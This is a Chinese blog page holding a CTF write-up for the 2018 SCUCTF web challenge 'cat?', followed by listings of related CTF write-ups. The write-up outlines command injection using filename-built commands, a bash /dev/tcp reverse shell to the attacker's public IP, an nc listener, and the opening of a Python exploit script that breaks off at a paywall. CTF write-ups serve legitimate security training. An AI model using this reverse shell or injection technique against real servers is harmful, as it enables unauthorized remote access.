2018 SCUCTF web题:cat?非常规题解

最新推荐文章于 2025-03-23 20:17:09 发布
最新推荐文章于 2025-03-23 20:17:09 发布
阅读量1.9k 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/perfect0066/article/details/85108416
本文介绍了在2018年SCUCTF中解决Web题目的一种非常规方法,包括寻找可写入目录,利用`>`构造文件名执行命令,创建反弹shell,并在服务器上设置监听。通过提供的Python脚本展示了具体实现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主要思路

1.寻找可以写入的目录
2.通过 > 构造文件名,在通过 ls -th>g 将命令写入文件
3.通过bash -i >& /dev/tcp/你的公网ip/监听的端口 0>&1构造反弹shell
4.在服务器使用 "nc -lnvp 相应端口"

python脚本如下

# -*- coding: utf8 -*-
import requests
import time
url='http://120.78.66.77:87/exec.php'

tmp='1.1.1.1;cd /t*;'

#生成ls -th >g
data1=[
	'>dir',
	'>sl',
	'>g\>',
	'>ht-',
	'*>v',
	'>rev',
	'*v>x',
	'cat x']

for i
最低0.47元/天 解锁文章

200万优质内容无限畅学
CTF之一天一:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1694
这个做的还是太明白,看了许多wp。在此小记录一下。 目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
[CTF目总结-web篇]攻防世界:Cat
T2hunz1
01-10 4309
[CTF目总结-web篇]攻防世界:Cat
SCUCTF
皮三宝好菜的博客
12-25 741
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
CTF的web方面型有哪些?
最新发布
lz5217x的博客
03-23 1172
CTF中的Web型涵盖了Web应用的各种漏洞和攻击手段,参赛者需要掌握SQL注入、XSS、CSRF、文件包含、命令注入、目录遍历、代码审计、SSRF、XXE、逻辑漏洞等知识,才能在比赛中快速找到并利用漏洞获取flag。• 型描述:通过发现Web应用的配置错误(如错误的文件权限、未关闭的调试模式等),获取敏感信息或权限。• 型描述:通过构造恶意SQL语句,攻击Web应用的数据库,获取敏感信息(如用户数据、flag等)。• 发现文件包含漏洞(如`include`、`require`函数)。
CTFHub技能树web(持续更新)--RCE--命令注入--过滤cat
jiuyongpinyin的博客
01-26 432
过滤cat 前面还是和上一篇文章一样,首先ping本机地址查看是否有回显,然后查看当前目录的文件: 看到了有flag字样的php文件,然后我们尝试使用cat,发现不行了: 在这里有很多种方法,可以使用单引号将cat包裹,还可以使用 sort 来查看: 查看网页源代码: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
AI:WEB:02靶场题解
qq_42133828的博客
09-19 1374
AI:WEB:02靶场题解 前期准备 镜像下载 https://www.vulnhub.com/entry/ai-web-2,357/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux 靶机:ip随配(192.168.203.136) 渗透开始 1.nmap发现主机,并扫描其ip信息, nmap --script=vuln 192.168.203.136 发现路...
CTF之WEB(BUGku Ctf 1-7 题解
RBMan的博客
12-18 1614
这几天做的一些CTF之WEB方向的,才入门所以会写一些心得。1~7的心得,不喜勿喷。我会坚持下去的。 一.post和get请求方式的不同 1.get:较为简单,如果叫你输入数值的话,直接在URL后面加就行了。格式如下: www.123123123.com/?abc=ABC(所需要提交的参数) 2.post:需要使用火狐上的插件HackBar,先打开该插件,再打开网页,然后URL就会出现在上面的大框中。图片如下: 然后,在下面的框中输入需要的提交的参数,就可以了。 二.关于get请求方式中遇到问
yyw_algorithm::laptop_computer:我的leetcode算法题解,详细的java版本。包括分类题解周赛题解剑指OFFER题解
01-31
``《剑指优惠》的题解也开始更新啦,官方是cpp的题解,我进行一波java题解更新! :smiling_face_with_sunglasses: 为什么要做总结?因为这样可以让自己思路更清晰,让自己理解更深一点(仓库的题解md文件框架都是...
深度解析:2021电工杯B题解思路与案例程序
资源摘要信息: "2021电工杯B详细思路(更新)+案例程序" 1. 标知识点解析 标中的“2021电工杯B详细思路(更新)”揭示了文档的主体内容,即对2021年电工杯竞赛的B目的详细解思路。电工杯是中国电气工程...
2018SUCTF部分wp
Risker
05-28 3067
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
攻防世界-web-Cat(XCTF 4th-WHCTF-2017)
Sea_Sand息禅
07-08 1万+
打开网页,有一个云端测试功能,提示我们输入域名,输入几个进行测试 1) baidu.com 没有反馈 但是输入百度的ip:220.181.38.148,反馈如下 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transm...
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
热门推荐
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
[CFI-CTF 2018]Kadyrov‘s Cat
wangjin7356的博客
04-01 869
目录 目链接 解过程 总结 目链接 https://buuoj.cn/challenges#[CFI-CTF%202018]Kadyrov's%20Cat过程 附上原的提示: A man from the soviet union has sent you two strange documents. Find the identity of the man as well as his location. Flag format is : CFI{Firs
NJCTF2017 线上赛 web 题解 By Assassin
Assassin
03-18 7278
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload: username=admin
[SUCTF 2018]GetShell
qq_43801002的博客
07-27 1411
目 过程 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 发现可以上传php文件,访问过后发现,直
2018 SUCTF cycle
ACdream
06-08 558
比赛的时候看到这个,通过率那么高,然后密钥长度给了提示是1-50,所以猜到了是暴力,太久没做Crypto了,已经忘记了还有维吉尼亚字频统计这一说了……找到了一个好的wp贴出来:https://findneo.tech/180527suctf/#Magic...
BUUCTF:[SUCTF 2018]GetShell
末初 · mochu7
08-01 2132
目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
SUSCTF 2019
皮三宝好菜的博客
04-14 1121
SUSCTF 2019 http://www.psbazx.com/2019/04/14/susctf-2019/ 懒得搬过来了。。。
CTFHub_技能树_Web之命令注入——“过滤CAT
Ho1aAs‘s Blog
07-24 1067
文章目录使用工具解过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解过程 查看源码,把cat指令过滤了,因此要绕开使用cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值